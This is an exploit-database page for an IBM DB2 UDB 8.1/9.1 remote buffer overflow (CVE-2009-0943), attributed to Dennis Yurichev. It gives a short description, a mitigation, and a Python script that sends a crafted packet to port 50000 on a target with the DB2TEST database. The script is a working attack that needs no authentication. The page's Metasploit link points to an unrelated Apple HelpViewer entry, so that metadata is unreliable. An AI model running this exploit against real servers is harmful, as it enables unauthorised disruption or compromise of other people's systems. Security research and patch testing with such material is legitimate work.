header-logo
Suggest Exploit
vendor:
DB2 UDB Server
by:
Dennis Yurichev
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: DB2 UDB Server
Affected Version From: 8.1/9.1
Affected Version To: 8.1/9.1
Patch Exists: YES
Related CWE: CVE-2009-0943
CPE: a:ibm:db2_udb_server:8.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-helpviewer-cve-2009-0943/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

IBM DB2 UDB 8.1/9.1 Remote Buffer Overflow

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM DB2 UDB. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DB2TEST database. The issue lies in the handling of a specially crafted packet sent to the DB2TEST database. An attacker can leverage this vulnerability to execute arbitrary code under the context of the DB2 service.

Mitigation:

Upgrade to the latest version of IBM DB2 UDB 8.1/9.1
Source

Exploit-DB raw data:

# Discovered by Dennis Yurichev <dennis@conus.info>

# DB2TEST database should be present on target system

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 50000))

sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43")

sockobj.close()

# milw0rm.com [2009-04-03]

Navigation

Suggest Exploit

Services By CQR